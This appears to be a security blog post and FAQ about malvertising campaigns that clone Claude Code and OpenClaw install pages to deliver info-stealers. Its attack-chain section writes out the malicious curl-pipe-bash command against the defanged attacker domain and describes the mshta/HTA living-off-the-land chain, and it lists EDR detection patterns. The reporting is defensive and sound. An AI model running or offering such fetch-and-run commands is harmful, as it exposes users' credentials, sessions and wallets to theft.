InstallFix is a social engineering technique that clones legitimate developer CLI install pages and replaces the install command with a malicious curl-to-bash payload. All other links on the page redirect to the real legitimate site, so the victim has no visual indication anything is wrong. It is a variant of ClickFix, which uses fake browser error dialogs to trick users into running PowerShell commands. InstallFix specifically targets developers who are accustomed to curl-pipe-bash install patterns for tools like Homebrew, Node.js, and increasingly AI CLI tools.

How did Google Ads serve fake Claude Code to users?

Threat actors purchased Google Ads targeting the search query 'install claude code'. The ad promoted a malicious site (claude-code-cmd.squarespace.com, confirmed live as of March 7, 2026) built to visually impersonate Anthropic's official documentation. Because paid ads appear above organic results, the first link a developer saw was the malicious one. This is the same technique used in previous malvertising campaigns against Notepad++, 7-Zip, and Obsidian. The Squarespace domain gave the site a trusted TLD and SSL certificate, removing the most basic red flags.

What is Amatera Stealer?

Amatera Stealer is a Malware-as-a-Service info-stealer based on ACR Stealer (itself a successor to Raccoon Stealer). It steals browser credentials and session cookies, cryptocurrency wallet files and seed phrases, saved passwords from system keystores, system information (hardware, OS, installed applications), and clipboard content. It has been delivered via App-V ClickFix script attacks previously. The fake Claude Code campaign appears to be among its first large-scale developer-targeted deployments. Amatera is sold as a subscription MaaS service — meaning any buyer can launch campaigns using the same payload.

How is the fake Claude Code campaign different on macOS vs Windows?

On macOS, the fake install page delivers a base64-encoded curl command that downloads a shell script from an attacker-controlled domain, which in turn retrieves and executes Amatera Stealer. The base64 encoding bypasses simple command-line content inspection. On Windows, the attack uses mshta.exe (the Microsoft HTML Application Host) to retrieve and execute a remote HTA file containing the Amatera Stealer payload delivered via conhost.exe. Both execution paths operate without writing a traditional executable to disk, relying on Living Off the Land Binaries (LOLBins) to blend with normal system activity.

What is the connection between the fake Claude Code and fake OpenClaw campaigns?

BleepingComputer's coverage of the fake Claude Code campaign (March 6, 2026) explicitly references the fake OpenClaw campaign from the previous week (March 5, Huntress MDR discovery) as the precedent case. Both campaigns use the InstallFix technique: cloned developer install pages hosted on trusted infrastructure. Fake OpenClaw delivered Vidar stealer and GhostSocks backconnect proxy. Fake Claude Code delivered Amatera Stealer. The two campaigns confirm InstallFix is a repeatable playbook being used against developer tools with strong 'trust the curl command' brand associations.

How do I protect myself from InstallFix attacks?

Core defences: (1) Never install developer tools by clicking Google Ads — go directly to the official GitHub repository or documentation site. (2) Before running any curl-pipe-bash command, pipe to 'cat' first to inspect the script: 'curl https://example.com/install.sh | cat'. (3) Use a package manager (Homebrew, Scoop, winget) to install known tools from verified repositories rather than running remote scripts. (4) If you did run a suspicious command, assume credential compromise: rotate all saved browser passwords, revoke active session tokens for any accounts that were logged in, move any cryptocurrency funds immediately, and enable hardware security keys (FIDO2) for critical accounts.

Fake Claude Code, Fake OpenClaw: The InstallFix Developer CLI Impersonation Campaign

🚨 Breaking — March 7, 2026 | Sources: Push Security, BleepingComputer, Huntress MDR

On March 5, Huntress MDR discovered attackers impersonating OpenClaw installers on GitHub, delivering Vidar stealer and a GhostSocks backconnect proxy to Windows users and Atomic Stealer to macOS users.

One week later, the same playbook — with a different target. Push Security and BleepingComputer confirmed on March 6 that attackers are now impersonating Claude Code, Anthropic's AI coding assistant, via Google Ads malvertising. The payload this time is Amatera Stealer, a new Malware-as-a-Service info-stealer targeting browser credentials, session tokens, and cryptocurrency wallets.

BleepingComputer explicitly cited the fake OpenClaw campaign as the precedent case. We covered that campaign last week. The pattern has a name now: InstallFix.

What Is InstallFix?

InstallFix is a social engineering technique, a close cousin to ClickFix, specifically designed to exploit developers' trust in curl | bash install patterns.

ClickFix, which emerged in 2024, tricks non-technical users with fake browser error dialogs: "Your browser detected a problem — press Win+R and paste this command to fix it." The command runs PowerShell. The user never questions it because it looks like a real system error.

InstallFix is the developer version of the same trick. Instead of a fake browser error, it clones the actual installation documentation for a real CLI tool. The page looks pixel-perfect — same fonts, same layout, same branding. Every link redirects to the real, legitimate site. The only thing that's different is the install command.

It's subtle enough to fool experienced developers. If you search for "install claude code" on Google and the first result is a Squarespace site with Anthropic's branding, how long would you look before running the curl command?

"Just hosting malware on GitHub was enough" — Huntress MDR, describing how the fake OpenClaw repositories were promoted by Bing AI search without any active exploitation.

Campaign 1: Fake OpenClaw (March 5)

The first confirmed InstallFix campaign targeted OpenClaw, the AI agent orchestration platform. (Note: the official OpenClaw repository is at github.com/openclaw/openclaw — not any search result.)

Huntress MDR discovered a fake GitHub organisation, openclaw-installer, that had copied legitimate Cloudflare Moltworker code to appear credible. The repositories were indexed and promoted by Bing AI's search results without any paid placement — just organic AI-recommended results.

Windows payload chain:

Fake OpenClaw_x64.exe → Rust-based loader chain (executed in memory)
Vidar Stealer — C2 infrastructure via Telegram and Steam profile pages (abuse of legitimate platforms to serve C2 config)
GhostSocks — SOCKS5 backconnect proxy establishing persistent tunnel from victim machine to attacker infrastructure

macOS payload chain:

Bash pastejacking → puppeteerrr/dmg repository
Atomic Stealer (AMOS) — macOS-specific info-stealer targeting Keychain credentials, browser data, and crypto wallets

The campaign was reported to GitHub. Removal status was unclear as of initial disclosure. The fake repositories leveraged GitHub's HTTPS certification to avoid the most basic browser warnings.

Campaign 2: Fake Claude Code — Amatera Stealer via Google Ads (March 6)

One week after the OpenClaw campaign, Push Security and BleepingComputer confirmed a second active InstallFix campaign targeting Claude Code.

This campaign is more sophisticated in its delivery mechanism: instead of relying on search engine AI recommendations or organic results, it uses Google Ads malvertising. Paid ads targeting "install claude code" promoted a malicious Squarespace site — claude-code-cmd.squarespace[.]com — confirmed live as of March 7.

Squarespace was chosen deliberately. It provides:

A trusted domain with valid SSL (no browser warnings)
Automatic CDN (fast load times that match legitimate documentation sites)
No IP reputation flags (Squarespace IPs are used by millions of legitimate sites)
Trusted enough to bypass many enterprise web proxies and content filters

The same pattern also extended to deployments on Cloudflare Pages and Tencent EdgeOne — all legitimate content delivery platforms that attackers are weaponising as a trusted infrastructure bypass.

The Attack Chain

macOS

The fake install page presents a command like:

curl -fsSL https://claude-code-cmd[.]squarespace[.]com/install.sh | bash

The install script is base64-encoded before delivery, making it opaque in logs and to shallow inspection. Once decoded and executed, it retrieves Amatera Stealer from a secondary attacker-controlled domain and executes it in memory.

Windows

On Windows, the attack leverages mshta.exe — Microsoft's HTML Application Host, a legitimate Windows binary used to run HTA (HTML Application) files. Mshta.exe is a Living Off the Land Binary (LOLBin) — a signed Microsoft binary that security tools trust.

The infection chain:

User runs the malicious install command from the fake page
Command invokes mshta.exe with a remote URL pointing to an HTA file
HTA file contains obfuscated VBScript/JavaScript that downloads Amatera Stealer
Payload executes via conhost.exe — another Windows LOLBin that blends with normal console activity

Both delivery paths avoid writing a traditional .exe to disk. This defeats file-hash-based detection and many endpoint security tools that focus on executable drops rather than script execution chains.

Amatera Stealer: What It Takes

Amatera Stealer is a relatively new Malware-as-a-Service info-stealer believed to be derived from ACR Stealer (itself a continuation of the Raccoon Stealer lineage, whose original author was arrested in 2022).

What Amatera steals:

Browser credentials — saved passwords from Chrome, Firefox, Edge, Brave, and derivatives. All major browser password stores are targeted.
Session cookies — active authenticated sessions for web services. With a valid session cookie, an attacker can hijack an authenticated session without needing the password. This bypasses SMS 2FA entirely.
Cryptocurrency wallets — wallet files, seed phrases, and private keys from MetaMask, Phantom, Exodus, and hardware wallet companion software
System intelligence — hardware identifiers, installed applications, OS version — sufficient to build a fingerprint for account recovery social engineering
Clipboard content — if you have a seed phrase or API key in your clipboard, it's exfiltrated immediately

The MaaS model means Amatera is available to any buyer willing to pay a subscription fee. The fake Claude Code campaign may not be the work of a sophisticated nation-state actor — it could be a criminal group that rented the stealer for a few hundred dollars and bought $50 in Google Ads.

This is the commoditisation of developer targeting. The attacker doesn't need to write malware. They need brand awareness of which developer tools people are currently installing.

Why This Pattern Works

Developer culture has a deeply embedded trust in curl | bash. The pattern was established by tools like Homebrew, Node Version Manager (nvm), Rust's rustup, and countless others. The security community has warned about this pattern for years — "never pipe to bash without reading the script first" — and yet it remains dominant because it genuinely is the most convenient install mechanism for cross-platform tooling.

The InstallFix technique exploits three compounding factors:

AI tool adoption urgency: Claude Code, OpenClaw, and similar tools are new and exciting. Developers want to install them quickly. They're less cautious with new tools than established ones.
Search result trust: Developers implicitly trust the first result on Google and Bing. Google Ads at the top of the results page look identical to organic results in most browsers.
Platform trust bypass: Squarespace and Cloudflare Pages are used by millions of legitimate businesses. No security tool flags them as suspicious. The HTTPS padlock is present. There are no browser warnings.

The Bing AI angle (fake OpenClaw campaign) adds a fourth factor: AI-curated search results that recommend repositories without adequate provenance verification. An AI recommending a malicious GitHub repository is a much stronger endorsement than a normal search result — users trust AI curation.

Detection Guidance

If You Think You May Have Run a Malicious Install Command

Assume full credential compromise and act accordingly:

Rotate all browser-saved passwords immediately. Use your password manager's bulk-change feature if available. Prioritise: email accounts, banking, any service with cryptocurrency or payment methods.
Revoke active session tokens. On all important accounts: log out all other sessions, revoke OAuth app authorisations, check for any new authorised applications or API tokens you didn't create.
Move cryptocurrency assets. If you have any crypto holdings, transfer to a new wallet address now. A compromised seed phrase is an irreversible loss.
Enable FIDO2 hardware keys on critical accounts. Unlike SMS OTP and authenticator-app TOTP, FIDO2 phishing-resistant MFA cannot be bypassed with stolen session cookies. A hardware security key would have protected you even after credential theft.
Re-image the affected machine if any production credentials or secrets were stored on it. Amatera is primarily an info-stealer but the GhostSocks proxy (fake OpenClaw campaign) establishes persistent remote access.

Endpoint Detection

If you run EDR on developer machines (you should), look for:

mshta.exe spawning child processes or making outbound network connections
conhost.exe with unusual parent processes or network connections
curl or bash invocations with base64 arguments (especially -d $(echo ... | base64 -d) patterns)
Outbound connections to squarespace.com or pages.dev from developer CLI sessions (not from a browser)
Browser process spawning unusual child processes (Atomic Stealer often injects into browser processes on macOS)

Safer Install Patterns Going Forward

If you must run a curl-pipe-bash install, inspect the script first:

# ❌ What most people do (dangerous):
curl -fsSL https://example.com/install.sh | bash

# ✅ What you should do (safe):
curl -fsSL https://example.com/install.sh -o install.sh
cat install.sh        # read it first
bash install.sh       # run it only if it looks legitimate

Better still: bookmark the official GitHub repository for every developer tool you use and only install from there. For AI CLI tools specifically, the official channels are:

Claude Code: github.com/anthropics/claude-code — only install via npm install -g @anthropic-ai/claude-code from the official npm package (published by @anthropic-ai)
OpenClaw: github.com/openclaw/openclaw — official repository only

The Trend: AI Tool Impersonation Is Accelerating

In the past six months, security researchers have confirmed malvertising campaigns impersonating Notepad++, 7-Zip, WinRAR, Obsidian, Git, and now Claude Code and OpenClaw. The common thread: tools that developers and technically sophisticated users install frequently.

The AI CLI category is especially attractive for attackers because:

Novelty: New tools have less established "official install" muscle memory. Users are more likely to click the first result.
Privileged installation: AI CLI tools typically request broad permissions (API key access, file system access, network access). Users accept these permissions as part of a normal install.
High-value targets: Developers installing AI coding tools typically have: code repositories, cloud API keys, AWS/GCP credentials, SSH keys, and access to production systems. The expected credential yield per victim is higher than a typical consumer target.
Low search literacy: "How do I install Claude Code?" is not a query that has an established, trusted answer in most users' minds. It's exactly the query type where a search result or AI recommendation carries disproportionate authority.

The recommendation: treat all AI tool install instructions from search results with the same scepticism you'd apply to a random GitHub repository from an unknown author. Verify against the official project site directly. Check the npm/PyPI publisher is the official organisation. When in doubt, don't run it.

Recommended Security Resources

If you're hardening your developer environment against credential theft and session hijacking:

The Web Application Hacker's Handbook — the definitive guide to understanding web-based credential attacks, session management flaws, and how attackers chain techniques from initial access to account takeover
Black Hat Python, 2nd Edition — covers the Python-based tooling behind most modern credential harvesters and info-stealers; essential reading for understanding what Amatera and Vidar are doing under the hood
A FIDO2 hardware security key — YubiKey 5C NFC for USB-C + NFC coverage, or YubiKey 5 NFC for USB-A. FIDO2 is the only MFA method that survives session token theft — the key proves physical possession in real-time, not a code that can be relayed.

💰 Affiliate disclosure: Links to Amazon products above use our affiliate tag (altclaw-20). If you purchase through these links, we receive a small commission at no extra cost to you. We only link to products we recommend for genuine security reasons.